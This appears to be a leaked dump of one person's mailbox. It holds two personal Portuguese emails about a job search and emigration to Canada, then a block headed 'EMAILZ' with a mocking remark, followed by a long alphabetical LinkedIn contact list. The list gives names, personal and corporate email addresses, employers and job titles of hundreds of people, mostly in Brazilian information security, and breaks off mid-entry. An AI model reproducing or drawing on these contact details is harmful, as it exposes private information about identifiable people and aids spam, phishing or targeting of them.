KB),CV-Orland...doc (69.9 KB) Oi Augusto !! Tudo bem?? Acho que na última vez em que nos falamos eu ainda estava com a minha empresa, e você na Fidelity. Pois é, soube que você saiu da Fidelity e está em uma consultoria, não é ? Conte as novidades... Depois de três ótimos anos, 2004, 2005 e 2006, e um péssimo, 2007, eu saí da sociedade, negociei minhas cotas e agora estou tentando voltar para a carreira corporativa. Contratei uma empresa de Outplacement, a Crossing, o que está sendo de grande ajuda, mas confesso que esse processo é muito chato, e estou um pouco entediado. Apareceram algumas oportunidades interessantes, mas ainda não fechei nada, se bem que ainda é cedo. Fora a experiência empresarial na Gnosis, você se lembra que eu tinha uma carreira mais gerencial no Banco. No entanto, estou aproveitando o tempo livre para estudar e tirar alguns certificados. O primeiro será, espero, o de Cobit, estou com a prova marcada para dia 29 deste mês. Meu primeiro objetivo é ministrar treinamento em empresas, além de enriquecer o CV e reciclar. Também estou interessado em obter CISA ou CISM, para tanto estou em contato com a WorldCom (pela qual vou prestar o Cobit) e tentando contato com o ISACA. Você tem alguma dica para me passar para a preparação deste exame ? O preparatório da WorldCom é muuuuito caro ... Pretendo fazer a prova no final deste ano. Pessoalmente, não sei se você sabe, mas eu e a Lia estamos finalmente casados e morando juntos, também com o Rafael, e está muito legal, algo que eu deveris ter feito antes. Mande notícias, vamos manter contato. Se você puder passar o meu CV aí na sua empresa ou em alguma outra, agradeço desde já, segue anexo. Um abraço, Orlando Um ano de Canadá From: Luciana Goulart Kairalla (lucikairalla@hotmail.com) Add contact Add contact Sent: Saturday, April 05, 2008 1:30:52 PM To: Augusto Paes de Barros (apbarros@gmail.com); Augusto Paes de Barros (apbarros@hotmail.com) Oi Gugu, tudo bem? Como estão os preparativos? Já receberam o pedido dos exames médicos? Por aqui tudo bem! Essa semana completamos um ano de Canadá! Em comemoração fizemos um vídeozinho, se tiver um tempinho é só acessar esse link: http://www.youtube.com/watch?v=zQaGEKKtiPI Tentamos retratar um pouquinho do que passamos nesse primeiro ano! Abraços, Lu assinado From: Augusto Paes de Barros (augusto@tempest.com.br) Add contact Add contact Sent: Sunday, May 11, 2008 9:22:16 PM To: apbarros@hotmail.com Augusto Quadros Paes de Barros, CISSP-ISSAP(r) Tempest Security Intelligence - www.tempest.com.br <=============EMAILZ apbarros@hotmail.com===================> OBS: esse cara e Luiz Zanardo (voide) tem mais contatos q um spammer haeuHAUeh <============= LinkedIN =============> # * Aarão, Maria Teresa mtaarao@uol.com.br Sales Manager at Certisign Certificadora Digital 344Connections * Abreu, Dimitri dimitriabreu@gmail.com Senior Information Security Specialist at Itaú 142Connections * Accioly Rosa, Daniel daniel.accioly@terra.com.br Information Security Consultant 152Connections * Adorno, Luiz luiz_adorno@hotmail.com Gerente de Negócios at Tempest Security Intelligence 22Connections * Agia, Rodrigo ragia@modulo.com.br Senior Security Consultant at Modulo 97Connections * Albuqueque, Aldo aldo@tempest.com.br Operations Manager at Tempest Security Intelligence 56Connections * Alcoforado, Ivan ivan.alcoforado@gmail.com Senior Manager, Security Practice, Accenture 369Connections * Almeida, Alessandro alessandro.almeida@atosorigin.com Security Coordinator at Atos Origin Brasil 24Connections * Almeida, Emanuel corbahn@hotmail.com Professional Security Services Consultant at IBM 156Connections * Altieri, Ana Cristina ana.altieri@certegy.com.br IT Infrastructure Director at Certegy Brasil 31Connections * Altieri, Ana Cristina ana.altieri@uol.com.br Information Technology and Services Professional 105Connections * Amaral, Paulo PAmaral.MBA99@alumni.stern.nyu.edu Superintendente at Banco Itaú 69Connections * Ancheschi, Rodolfo rodolfosa@gmail.com IT Security Coordinator 48Connections * Antunes Santin, Cristiano csantin@vr.com.br Senior Product Manager at Banco VR 103Connections * Aranha, Carolina carolaa@microsoft.com Marketing Manager at Microsoft 24Connections * Araujo, Jaime jaraujo@viaforum.com.br Owner, Riverbend Consultoria 10Connections * Artur, Otávio Luiz otavio.artur@ipdi.com.br CEO at IPDI Instituto de Peritos em Tecnologias Digitais e Telecomunicações 66Connections * Asano, Erik Yuzo erik@tempest.com.br Process Analyst at Tempest Security Intelligence 18Connections * Augusto, Alexandre asaugusto@yahoo.com.br Information Security specialist 27Connections * Avila, Caren caren_avila@hotmail.com Information Security Consultant 40Connections * Aylward, CISSP, CISA, Anton anton@si.on.ca Security Evangelist, Owner, System Integrity -- Information Technology Assurance and Risk Management Consulting 116Connections # B * Baccala, Wanderley wbaccala@hotmail.com IT Manager at Banco Itau 120Connections * Bahia, Fábio fbahia@hotmail.com Production Manager at Maquinas Flores 2Connections * Baltar, Alexandre baltar@br.ibm.com Tech Solution Manager at IBM Brasil 36Connections * Baraldi, MBA,PMP, SCEA, Ricardo rbaraldi@hotmail.com Sr Solution Architect at Sun Microsystems 44Connections * Barbieri, Claudiney claudiney.barbieri@barbierinet.com Solutions Architect / Network Consultant / IT Services Consultant 13Connections * Barbosa, Paulo prbarbosa@gmail.com Information Security Consultant at Ecija 105Connections * Barreto, Luciano lbarreto@cautus.com.br Information Technology and Services Consultant and Contractor 26Connections * Barreto, Luciano lucianobmb@gmail.com Direct Energy 99Connections * Barros, Karine karine.barros@unear.net Gerente Comercial at U.NEAR 11Connections * Bastos, Alberto abastos@modulo.com.br CTO at Modulo Security and Owner, Modulo Security 149Connections * Baumel, Tereza tcbaumel@hotmail.com Systems Analyst 67Connections * Bela Cruz, Daniela danielasbc@hotmail.com Application Service Factory Manager at T-Systems 70Connections * Bennaton, Leandro leandro.bennaton@corp.terra.com.br Information Security at Terra Networks Brasil 93Connections * Bezerra, Marcelo bezerram@br.ibm.com Security Solutions Manager, Latin America at IBM 145Connections * Bhalla, Nish nish@securitycompass.com Founder, Security Compass 500+Connections * Bittencourt, Gustavo gbitten@gmail.com Engineer, Project Manager & Consultant 67Connections * Bonezi, Patricia patricia.bonezi@gmail.com IT Analyst at TV Globo 29Connections * Bonomi de Castro, Victor vbonomi@gmail.com Information Security Consultant 32Connections * Borba, CISSP, Marlon MBORBA@trf3.gov.br Security Officer at Tribunal Regional Federal 85Connections * Bordini, Thiago thiago@roti.com.br Analista at Skylan Technology and Computer & Network Security Consultant 24Connections * Borges, Marcelo marcelo.borges@gmx.net Security Analyst at Telecom Italia 137Connections * Borgonovi (wborgonovi@terra.com.br), Wladinir wborgonovi@terra.com.br Headhunter ICT / TI. Owner/Partner Training Company. Learning Services Provider . 228Connections * Bottai, Daniela dbottai@uol.com.br General Electric Compliance Manager & Internal Controls- Consumer Finance 61Connections * Braga Rodrigues Craveiro, GCIH, Paulo paulobrc@gmail.com Senior Information Security Consultant 105Connections * Branco, Rodrigo rodrigo@kernelhacking.com Security Expert at Check Point Software Technologies 229Connections * Braz, Marlon marlon.braz@proteus-security.com Information Security Project Manager at Proteus Security Systems and Computer & Network Security Consultant 42Connections * Brito Costa, Joao Marcelo jmbcosta@gmail.com Experienced Project and Security Manager, with strong background in industry standards (PMBOK, ITIL, COSO, COBIT, etc.) 278Connections * Bruno, Ricardo rbruno7@gmail.com IT Security Professional 18Connections * Bulhões, GCFW, Diogo diogo.bulhoes@gmail.com Senior Systems Engineer - Latin America at Ruckus Wireless 280Connections * Buscariolli, Roberto roberto.buscariolli@terra.com.br Business Management and Risk Intelligence Expert 135Connections * Buscariolli, Roberto rbuscariolli@bkb.com.br O&T Manager - Risk Manager at BankBoston Brazil 6Connections # C * Cabral, Eduardo cabraledu@yahoo.com.br Information Security Consultant 83Connections * Caine, Nikita nikita@Blackhat.com Speaker Liaison & Administrative Assistant 193Connections * Camargo, Eduardo eduardo.camargo@certegy.com.br CIO at Certegy Inc 31Connections * Camargo, Sergio srcamargo1@hotmail.com Information Tecnology at Hedging Griffo 28Connections * Caprino, Willian wcaprino@gmail.com Information Security Specialist at Visanet 204Connections * Caraponale, Dario dcaraponale@strongsecurity.com.br General Director 136Connections * Cardoso, Alvaro alvaroluis@cardosodesousa.com.br lawyer at J Delinski Advogados 1Connections * Cardwell, Andrew linkedin5@cardwell.co.uk Computing Security Officer - linkedin5@cardwell.co.uk - MyLink500.com proud 7413 connections 500+Connections * Carrera, Ero ero.carrera@gmail.com Reverse Engineer at zynamics GmbH (was SABRE Security) & Independent Information Technology and Services Professional 167Connections * Carvalho, Alan alancarv@uol.com.br Researcher and Consultant in Information Technology 213Connections * Castro, Renato recastro@bigfoot.com Information Security Officer at Citibank 153Connections * Castro, Ricardo ricardo_mathias@terra.com.br INTERNAL AUDIT COORDINATOR at Hamburg Sud 17Connections * Castro de Vasconcellos, Ronaldo ronaldocv@gmail.com Network Security Analyst, GIAC [GAWN,GCIH], BS 7799 90Connections * Cavina, Alexandre alexandre.cavina@globo.com Information Security Manager 249Connections * Cesar Burgheri, Paulo paulo.burgheri@unibanco.com.br Analista de Telecomunicações at Unibanco 16Connections * Chacon, Adilson adilsonchacon@gmail.com Software Developer at Tempest Security Intelligence 40Connections * Chaple, Ray rchaple@hotmail.com IT Security - CISSP. CISA 61Connections * Chino, M.Sc., Fabio Jun Takada jun-chino@uol.com.br Research Manager at Tempest Security Intelligence and Computer Software Development Consultant 41Connections * Chuvakin, Anton anton@chuvakin.org Chief Logging Evangelist at LogLogic 500+Connections * Cintra, Elisama ec.cintra@uol.com.br Headhunter at Passarelli Consultores 436Connections * Claudia, Ana anaoliv@microsoft.com Product Manager at Microsoft Brasil 52Connections * Cloves, Sergio scloves@visanet.com.br Security Officer at Visanet 183Connections * Coelho, Afonso afonso.coelho@gmail.com Regional Manager at Módulo Security Solutions SA 36Connections * Cohen, Matthew matcohen@cox.net COO at NT OBJECTives, Inc. 316Connections * Cook, Nelson nelsonc@procom.ca Account Manager at Procom 130Connections * Cornélio, Carlos carlos@celtic.com.br Owner, Celtic Informática Ltda 42Connections * Correa, Nelson ncorrea@nelsoncorrea.com Technical Director at Global e-Secure 159Connections * Correia, Adalto adalto.correia@proteus.com.br Security Project Manager at Proteus Security Systems 34Connections * Costa, Bruno bcc@nyc.rr.com Head of Information Security at Safra National Bank 104Connections * Costa, Ricardo rcosta@cautus.com.br Senior Security Specialist, CISSP, ITIL Foundations 49Connections * Cota, Luiz lcota@globo.com Director 79Connections * Couto Kasa, Rogerio rogerio.kasa@gmail.com Network Security Analyst at Credit Suisse 68Connections * Curilla, Felipe felipegcurilla@terra.com.br Software Engineer at SupportComm S/A 24Connections # D * D'Addario, CBCP, Jeferson jeferson@daryus.com.br CEO, DARYUS Risk Consulting Brasil 91Connections * D'Alesandro, Vinicius vdalesandro@gmail.com Pátria Investimentos 82Connections * Dabul, Rogerio rogerio_dabul@yahoo.com.br Identity Management and Network Security Professional 7Connections * Dagnone, Donaldo M. dmdagnone@yahoo.com.br Architect at Citibank 280Connections * Dalesandro, Vinicius vdalesandro@proteus.com.br Analista de Vulnerabilidades at Proteus Security Systems 3Connections * De Barros Schwenck, Gerson gersonpaes@terra.com.br Owner, PhiMKT - Consultoria em New Marketing 2Connections * Dellai Schlieper, Alexandre adellai@ticket.com.br Professor at FAAP and Relationship Manager at WEBB 115Connections * Desidera, MSc, CISSP, Lucimara ldesidera@gmail.com PKI and Information Security Senior Consultant 233Connections * Devus, Janaina jdevus@gmail.com Information Security Project Manager/ Risk Management&Security Specialist at Modulo Security 82Connections * Dias, Sergio stdiasp@gmail.com Systems Engineer at Symantec Corporation 210Connections * Dias, Sérgio Almeida sergio.dias@gmail.com Project Manager at Scopus Tecnologia Ltda 83Connections * Dionisio, Marcelo mdionisio@certegy.com.br Gerente Des. Sistemas at Fidelity 40Connections * Domingos, Alexandre adomingo@modulo.com.br Security Consultant at Modulo Security and Information Technology and Services Consultant 38Connections * Domingues, Anderson anderson.domingues@gmail.com Information Security Specialist at Philips Electronics 92Connections * de Andrade Máximo, João Carlos joao.andrade@estadao.com.br Manager at Fidelity 88Connections * dos Santos, Luiz Eduardo luiz.eduardo@gmail.com Senior Systems & Security Engineer at Ruckus Wireless 500+Connections * dos Santos Antonio, Anderson anderson.antonio@br.unisys.com Enterprise System Support Analyst at Unisys Global Outsourcing 24Connections # E * Elias, CBCP, SANS GIAC, CobiTc, ITILc, Wagner welias@conviso.com.br Manager of Research & Development at Conviso Information Security Technical Services 119Connections * Endo, Paulo pcejoaquim@yahoo.com.br I.T. Analyst at CPFL Energia Group 17Connections * Episcopo, Marcio marcio.episcopo@gmail.com Executive Sales Manager at Oracle 154Connections * Etges - CISSP/CISA, Rafael rnetges@yahoo.com Practice Manager, Governance, Risk & Compliance 141Connections * Eugenio, Alexandre aleugenio@terra.com.br Gerente de Negócios - Virtualização e Entrega de Aplicações 43Connections # F * Faber, Alexander afsilva@bkb.com.br Risk Manager 38Connections * Fabiano, Alberto alberto.fabiano@ieee.org SDA at Quanta Tecnologia Eletrônica 161Connections * Farias, Hugo hfarias_bsb@yahoo.com.br Network Administrator and Information Security Analyst 5Connections * Farmer, Doc Doc.Farmer@gmail.com InfoSec Inc. - Senior Security Specialist - RACF z/OS - Doc.Farmer@gmail.com - LION - OpenNetworker - 6700+/11.8M+ Total 500+Connections * Favero, Alberto aefavero@terra.com.br Technology & Security Risk Services Partner at Ernst & Young 233Connections * Febrônio B. Alves, Boni fba.boni@gmail.com Coordenador de Programas de Formação at Veris Educacional S/A 15Connections * Felix, Paulo pmateusfelix@gmail.com Intelligence & Law Enforcement Professional 118Connections * Ferreira, Artur arturvf@dglnet.com.br Gestor de Projetos - Consultor at Orbitall 63Connections * Ferreira, Bruno blferreira@gmail.com Outsourcing Services Principal at HP 61Connections * Ferreira, Geraldo g_ferreir@yahoo.com.br Especialista em gestão de segurança da informação 46Connections * Ferreira, Lucas lucas.ferreira@gmail.com Information Security Professional, CISSP, M.Sc. 76Connections * Figueiredo, Marcelo marcelo@lynex.com.br Information Security Manager at Lojas Marisa, Teacher at Faculdade Impacta 27Connections * Finardi, Sandra sandrafinardi@gmail.com Human Resources Consultant at DM Recursos Humanos 109Connections * Fiori de Oliveira, Marcelo marcelo.fiori@bricon.com.br Director of Technology and Innovation at Bricon Security & IT Solutions 69Connections * Firmino, Luiz luiz.firmino@hsbc.com.br IT Security Solutions Manager at HSBC Brazil 193Connections * Folly, Eduardo eduardo@folly.com.br Gerente de Planejamento Estratégico at Pamcary 347Connections * Fonseca, Fernando fernando@fernandofonseca.info Information Technology and Services Consultant and Contractor 77Connections * Frassinetti, Fabio fabiozalpa@gmail.com Information Security Officer at Itaubank 24Connections * Freire, Alexandre alexcamposfreire@hotmail.com Senior Pre Sales Security Consultant @ Oracle - Information Security MBA Professor @ NCE - UFRJ. 273Connections * Freire, Virgilio vfreire@uol.com.br Senior Consultant, Telecom. Strategy, Project Management, Operations, RollOut, StartUp, Sales, Marketing 500+Connections * Freire Pinheiro, Eduardo eduardo.pinheiro@certegy.com.br Gerente de Finanças e Contabilidade at Fidelity Processadora e Serviços S.A. 22Connections * Freitas, Robson robson.freitas@proteus.com.br Consultant Supervisor at Proteus Security Systems 31Connections * Fucs, André afucs@uol.com.br Senior Information Security Consultant 257Connections * Fávero, Alberto aefavero@banespa.com.br Technology & Security Risks Services Partner at Ernst & Young 48Connections # G * Gaido, Vanderlei vgaido@uol.com.br Sales & Marketing Executive 123Connections * Garcia, Maria ggarciamaria@gmail.com Systems Coordinator; DRP & BCP at Certegy Ltd 2Connections * Gaspar, Philipe philipe.gaspar@br.pwc.com Associate at PricewaterhouseCoopers 36Connections * Giorgi, Ricardo skydiver@dialdata.com.br Information Security Professional 132Connections * Gomez-Sanchez, CISSP-ISSAP, CISM, Juan Juan_GomezSanchez@yahoo.com Principal / Founder at Optima Consulting Inc, 211Connections * Goncalves, Rosangela rosangela.goncalves@itau.com.br - at - 1Connections * Gonçalves, Paulo ledcrash@gmail.com Specialist Information Security and Development Professional, almost a CISSP and SSCP 40Connections * Gonçalves, Rosangela romalais@gmail.com Security Officer 13Connections * Grossi, Marcos mgrossi@itaubank.com.br Superintendente at Banco Itaú 109Connections * Guimaraes, Rudnei rsguimaraes@bol.com.br Information Security and Security process 59Connections # H * Haical, Cristiane chaical@modulo.com.br Gerente de Comunicação at Módulo Security 46Connections * Hamada, Myke mykesh@gmail.com Information Security Specialist 35Connections * Hashimoto, Rafael rafael.hashimoto@gmail.com Senior Infosec Analyst at Banco Safra 127Connections * Hay, Andrew andrew.hay@q1labs.com Integration Product/Program Manager at Q1 Labs 500+Connections * Herrmann, Marcus Faversani m.hat@uol.com.br Information Security Specialist, TIVIT Tecnologia da Informação SA 215Connections * Herrmann, Renato rhbasto@gmail.com Security Officer 67Connections * Hines, Eric ehines01@gmail.com Managing General Partner, The Kalla Group 132Connections * Holanda, Joeldo jo_holanda@yahoo.com PKI Lead Engineer at Gennari & Peartree 45Connections * Hora, Victor victor@tempest.com.br Junior Security Engineer at Tempest Security Intelligence 32Connections # I * Inocente, Valter valter.inocente@modulo.com.br Project Manager at Modulo Security Solutions 32Connections # J * Jabbusch, Jennifer jj@cadinc.com CISSP, Network Security Specialist 205Connections * Janssen, Robert rjanssen@viaforum.com.br Owner, Via Forum 114Connections * Jarske, Johne johnejarske@hotmail.com IT Manager 140Connections * Jones, Jeff jrjones@microsoft.com Director at Microsoft 122Connections * Julião, Marcos mjuliao@modulo.com.br Project Manager at Modulo security 83Connections # K * Kamizaki, Theruco therucok@yahoo.com.br Network Coordinator at Fidelity Information Services 39Connections * Krause, Carlos ckrause@krauseconsultoria.com.br Information Security Consultant 20Connections * Kuhl, Rubens rubensk@gmail.com Internet and Telecom Experienced Professional 317Connections * Kulikovsky, Sérgio skulikovsky@certisign.com.br Chairman of the Board at Certisign 202Connections # L * Lagoutte, Jean-Yves Jean-Yves@MercerBridge.com Principal Consultant at MercerBridge Search & Selection 316Connections * Larrañaga, Alfredo Gabriel alfredo@larranaga.eng.br Director at ECtel Ltd. 487Connections * Leite, Alcemiro miroitau1@miro.com.br Senior Systems Analyst at Banco Itau S.A. 39Connections * Leite, Celso cleite@modulo.com.br Business Executive at Modulo Security Solutions 37Connections * Leite, Celso celso.h.leite@terra.com.br Business Executive at Modulo Security Solutions 4Connections * Leite, Celso celso.leite@linuxmail.org Business Executive at Modulo Security Solutions 22Connections * Leite, Sergio smleite@bkb.com.br Banking Professional 20Connections * Leto Biolo, Fabio fabio@smartsec.com.br Owner, SmartSEC 88Connections * Lewis, Sean sean@suspend.net Security Architect at Microsoft Corporation 500+Connections * Lima, Alvaro alima@modulo.com Entrepreneur, Visionary and Hands on business development 168Connections * Lima, Pedro Ivo ivolima@gmail.com Solutions Manager 155Connections * Lin, Rogerio rogerio.lin@gmail.com Research Director at IQPC 128Connections * Lincoln, Cristiano lincoln@tempest.com.br CTO at Tempest Security Intelligence 136Connections * Lo Visco, PMP®, Marco marcolovisco@mensa.org.br Project Manager, PMP, CSM, ITIL, COBIT, CPA-10 154Connections * Lu, Lily lily.lu@richardson-moore.com Senior Consultant at Richardson-Moore 153Connections * Luis Taramelli Moro, Fabio morofabio@gmail.com Information Security Officer 17Connections # M * M. S. Ribeiro Arthur, Ana ana.arthur@terra.com.br R&D at Omatek/MiPc 77Connections * Marque, Norberto normarque@uol.com.br IT Architecture Manager at Editora Abril 120Connections * Marques, Davison DRMARQUES@BKB.com.br Security Office at BankBoston 24Connections * Martins, Cleiton cleiton@gmail.com Security Analyst at Tempest Security Intelligence 62Connections * Martins, Guilherme gpmartins@gmail.com Information Technology Security Consultant 464Connections * Matthey, Philippe philippe@matthey.com.br Information Security Coordinator Latin America 119Connections * Mauser, Daniel dmauser@hotmail.com Premier Fiel Engineer - Microsoft 24Connections * Maçan, Eduardo Marcel eduardomacan@gmail.com Network Manager / Security Officer at Colégio Bandeirantes LTDA 72Connections * McKeay, Martin martin@mckeay.net Security Professional 233Connections * Melo, Kleber kleber.melo@hsbc.com.br CISO at HSBC 64Connections * Mendes, Haryson harysonmendes@gmail.com Network Security Professional 23Connections * Mendes, Joao joao@proteus.com.br Co-founder, Proteus Security Systems 38Connections * Menezes, Ed Wilson ed-wilson@uol.com.br Information Technology and Security Expert, CISSP, CISM 500+Connections * Mesa - Valeria@pierpoint.com, Valeria valeria@pierpoint.com Recruiter at Pierpoint 343Connections * Meyer, Priscila pmeyer@modulo.com.br Business Executive and Senior Infosec Consultant at Modulo 26Connections * Meyer Pflug, Andre fitandre@hotmail.com Owner, SKICLUB and Owner, OMATEK 54Connections * Mezzanotti, Marcello marcello.mezzanotti@gmail.com Information Security Consultant at Cipher Segurança da Informação 57Connections * Michellis, Denis dmichell@modulo.com.br Security Consultant at Modulo Security Solutions 68Connections * Migotto, Italo imigotto@gmail.com Unix Professional at IBM 43Connections * Milagres, M.Sc., CISSP, Francisco francisco@milagres.com IT Advisory Manager at KPMG in Brazil 254Connections * Miyake, Mario mymiyake@ipt.br researcher at IPT 36Connections * Monteiro, Daylton daylton@uol.com.br Country Manager - Brazil at Radware 437Connections * Monteiro, Gustavo contato@gustavomonteiro.com Information Security Analyst at Tempest Security Intelligence 66Connections * Montenegro, Fernando fsmontenegro@gmail.com Security Architect at Hewlett Packard 225Connections * Montenegro, Ulisses ulisses.montenegro@gmail.com Development Technical Lead at Tempest Security Intelligence 72Connections * Montoro, Rodrigo(Sp0oKeR) spooker@gmail.com Infrastructure/Security Analyst at Okto 172Connections * Mora, Robert robert@first-tech.com Business Manager at First Tech and Owner, First Tech 11Connections * Moraes, Anchises anchisesbr@gmail.com Senior IT and Information Security Professional 255Connections * Moraes, Gustavo moraesg@uol.com.br Technology Director at BankBoston 117Connections * Moreno, Wilson wilson.moreno@softway.com.br Network Admin at Softway 4Connections * Moser, André Luís andreluismoser@hotmail.com Consultor Java J2EE at Accenture 42Connections * Motoki, Ronaldo rmotoki@uol.com.br Information Technology and Services 146Connections * Moura, Marcelo marcelo.moura@proteus.com.br Security Analyst at Proteus Security Systems 4Connections * Mulvale, Bill bmulvale@symcor.com Sr Information Security Architect at Symcor Inc. 5Connections * Murr, Antonio amurr@terra.com.br E-Commerce Manager at Terra 76Connections * Murray, Mike mmurray@episteme.ca Writer / Information Security Professional / Social Engineer 274Connections # N * Nanini, Luiz lnanini@terra.com.br Marketing & Sales Executive Brazil and Latin America 464Connections * Nash, Curtis curt_nash@hotmail.com C.E.O. Compliant Phones Ltd. UK based mobile phone recording company. 500+Connections * Nassif Zamai, Khalil khalilnz@gmail.com Information Security Professional 77Connections * Navarro, Mairlos mairlos.navarro@gmail.com General Manager at Stefanini Training 52Connections * Nery, David 4220.david@bradesco.com.br I.T. Security Projects at Banco Bradesco S.A. 63Connections * Niacaris, Cesar Augusto cesaraugusto@imprensaoficial.com.br MCSO - Systems Engineer at Imprensa Oficial do Estado de São Paulo 37Connections * Niizu, Fábio Yuasa fabio_niizu@yahoo.com.br Engenheiro at CPqD 35Connections * Novaes Neto, Nelson nnovaes@yahoo.com Information Security Officer(CSO) and Business Continuity Leader at UOL 303Connections * Nowicki, Sheila sheila@nowicki.com.br Owner, Nowicki Consultoria em Recursos Humanos and Information Technology and Services Specialist 39Connections * Nunes, Adilson adilsonmonteiro.nunes@eds.com Computer Networking Consultant and Professional 9Connections * Nunes, Julio julio_n@terra.com.br IT Manager 50Connections * Nunes, CISSP, CISM, Francisco fr.nunes@uol.com.br Sales Engineer at Secure Computing 101Connections * Nuno Vieira Ferreira, Duarte dnunovf@hotmail.com Tempest Security Intelligence 22Connections # O * Oda, Marcos marcos.oda@gmail.com System Architect at Fidelity 48Connections * Oliveira, Claudio claudio99@gmail.com Information Security Consultant at BASF S.A. and Owner, GetService 19Connections * Oliveira Vieira de Morais, Thiago cmagicos@gmail.com Software Engineer at Hay Group 72Connections * Opice Blum, Renato renato@opiceblum.com.br Technology and Computer Law Attorney; Professor. CEO at www.opiceblum.com.br 160Connections * Orefice, Daniela dorefice@bkb.com.br Internal Communication Manager at BankBoston(BAC) 37Connections * Orsi, Ricardo ricardo.orsi@ig.com.br Diretor de Novos Negócios at Tempest Security Intelligence 90Connections * Ozelo, Alexandre alexandre.ozelo@terra.com.br System Analyst at EDS and Computer Software Consultant 6Connections # P * Pais, Joel joel@certegy.com.br Diretor de Infra - Estrutura at Certegy Ltda. 37Connections * Paranhos, Mauricio mparanhos@gmail.com Information Tecnology Coordinator at APEX-Brasil 73Connections * Penaranda, Felipe silfe02@yahoo.com Principal Consultant at Computer Associates and Computer Software Consultant 75Connections * Pereira, Raphael raphael.pereira@chemtech.com.br Business Developer of Industrial Information Security at Chemtech 179Connections * Pereira, Ricardo Manoel rmpereir@ig.com.br IT & Telecom Manager 80Connections * Pereira, Victor vpereira@email.com Independent Information Technology and Services Professional 55Connections * Pierce (tab.pierce@gmail.com), Tab tab.pierce@gmail.com Business Development at Security Innovation 500+Connections * Pimenta, Cristiano cristiano.pimenta@telemigcelular.com.br Manager Human Resources at VIVO MG 50Connections * Pinheiro, Marcus marcus.pinheiro@secure1.com.br Country Manager at Secure Computing Corp. 114Connections * Pinho de Freitas, Luiz Carlos lcpfreitas@yahoo.com.br Computer Software Consultant and Contractor 6Connections * Pires, Ricardo rluispires@gmail.com Key Account Manager at Open Communications Security 37Connections * Poggi, Eduardo poggi.eduardo@gmail.com IT GRC Senior Solutions and Operation Manager at Modulo Security Solutions 141Connections * Prado, Denis dprado@tippingpoint.com Senior System Engineer at TippingPoint, a division of 3Com Corporation 59Connections * Prado, Larissa larissaprado@uol.com.br Consultant at Accenture 126Connections * Proctor, Wayne wayne.proctor@firstdata.com Chief Information Security Officer at First Data USA 145Connections # R * Rabello, Luis lrabello@pobox.com Information security and IT governance expert 165Connections * Ramos, Anderson aramos@datacastle.com.br International Information Security Consultant, Instructor and Writer focused on the IT GRC market 500+Connections * Ramos, CISSP, CISM, CIFI, Fabio framos@axur.net Owner, Axur Information Security 55Connections * Rasmussen, M.Sc, Mads rasmussen.mads@gmail.com Senior IT Security Consultant, Research and Development Manager 111Connections * Reis, Mateus mateusr@gmail.com Coordenador at Banco ABC Brasil 27Connections * Rejowski, Rubens rubens@mail.pqi.ep.usp.br Scientific Research Professional 2Connections * Rejowski, Rubens rubens@lscp.pqi.ep.usp.br Chemical Engineering at USP 1Connections * Ress, Weber wress@live.com Senior Security Consultant at Symantec 144Connections * Ribeiro, Alfredo allrribeiro@uol.com.br Security Officer 26Connections * Rifkin, Adam ifindkarma@gmail.com Undercaffeinated. Overconnected. And All Man. 500+Connections * Rizato, Reginaldo rarizato@gmail.com Independent Financial Services Professional 4Connections * Rocha, João jrocha@brturbo.com.br Enterprise Solutions Engineer at ASG 114Connections * Rodrigues, Ramiro ramiro.rodrigues@pobox.com ICT and Security Program/Project Executive 268Connections * Rodrigues, Ramiro rodrigues.ramiro@gmail.com Project Manager at HP Brasil 58Connections * Rodrigues, Rangel rangel@sk8.com.br CISSP, Senior Information Security Consultant at Ernst & Young 160Connections * Rodrigues, Reginaldo Sarraf P. rsarraf@terra.com.br Security Information, Information Technology and Services and New Technologies 58Connections * Romcy, Marcelo mromcy@proteus.com.br Owner, Proteus Security Systems 70Connections * Romio, Daniel daniel.romio@nokia.com CISSP, Sales and Technical Manager - Brazil at Nokia 206Connections * Rosenfeld, Ada adarosen@gmail.com Sales Manager at Tempest Technologies 149Connections * Rossetto, Newton nerossetto@bkb.com.br Information Security Manager 5Connections * Rosti, MBA, CISA, Umberto urosti@terra.com.br Security Manager at Ernst & Young 64Connections * Rufino, Nelson Murilo nelson@pangeia.com.br Security Architect at Pangeia Security Systems. Computer & Network Security Consultant 87Connections * Rêgo claudio.rego@antecipar.com.br, Cláudio claudio.rego@antecipar.com.br Coodenador do Curso de Pós-Graduação em Inteligência e Contra-Inteligência da Faculdade Pitágoras 354Connections # S * Sabrina de Lima Escobar, Larissa LEscobar@visanet.com.br Security Specialist at Visanet 108Connections * Sacchi Rezende, Evangelo evangelo.sacchi@uol.com.br Project Manager and UML Specialist 48Connections * Salum, Felipe fsalum@yahoo-inc.com Service Engineer at Yahoo! 176Connections * Santa Rita, Marcelo marcelo.santarita@gmail.com Project Manager & IT/IS Architect 154Connections * Santanna, Giovani giovani_santanna@terra.com.br Professor at FIAP and Computer & Network Security Consultant 10Connections * Santarcangelo, Michael michael@securitycatalyst.com Catalyst | Changing how people protect information 500+Connections * Santiago, Felipe felipe.santiago@tempest.com.br System Administrator at Tempest Security Intelligence 19Connections * Santos, Jair jairds@shaw.ca Software Engineer at Cliconnect 92Connections * Santos Jr., CISSP, Antonio asantosjr@uol.com.br Information Security Consultant at Fidelity Processadora e Serviços S/A 147Connections * Santos, CISM, Analene analene.santos@fnis.com Corporate Audit Director 12Connections * Schaumburg, Andre alcorreia@santander.com.br IT General Manager at Banco Santander 400Connections * Schreiber, Valmir valmir.schreiber@br.bnpparibas.com Security Officer at Banco BNP Paribas Brasil SA and ISACA-SP President chapter 48Connections * Schwenck, Gerson gpbs77@hotmail.com Publicitário / Midias Interativas / Vídeo Design 4Connections * Scola, Antonio Carlos acscola@sunlit.com.br An aggressive Hunter for SALES and BUSINESS DEVELOPMENT opportunities 290Connections * Semola, Marcos marcos@semola.com.br Manager, Global IT GRC at Shell Oil Company Netherlands, MBA Professor at FGV (marcos@semola.com.br) 493Connections * Sethi, Rohit rohit@securitycompass.com Manager at Security Compass 94Connections * Silva, Alan jumpi@bsdcertification.org Owner and Principal Software Engineer, Freshmeat Informatica 107Connections * Silva, Breno breno.silva@gmail.com Information Security Specialist at Alcatel-Lucent 79Connections * Silva, Igor volcov@gmail.com Senior Information Security Consultant at Modulo Security Solutions 275Connections * Silva, Jose Eduardo joseeduardo@gmail.com Microsoft Business Solutions 35Connections * Simões, Mara mara.simoes@nextel.com.br Information Security Supervisor at Nextel 114Connections * Smiley, Garrett gsmiley@isc2.org Mgr. of Professional Programs at (ISC)2 51Connections * Smith, Jerry j.jerry.smith@gmail.com Product Engineer at CSI Wireless 67Connections * Sousa (mamaralsousa at gmail), Marcelo Amaral F. masousa@timbrasil.com.br 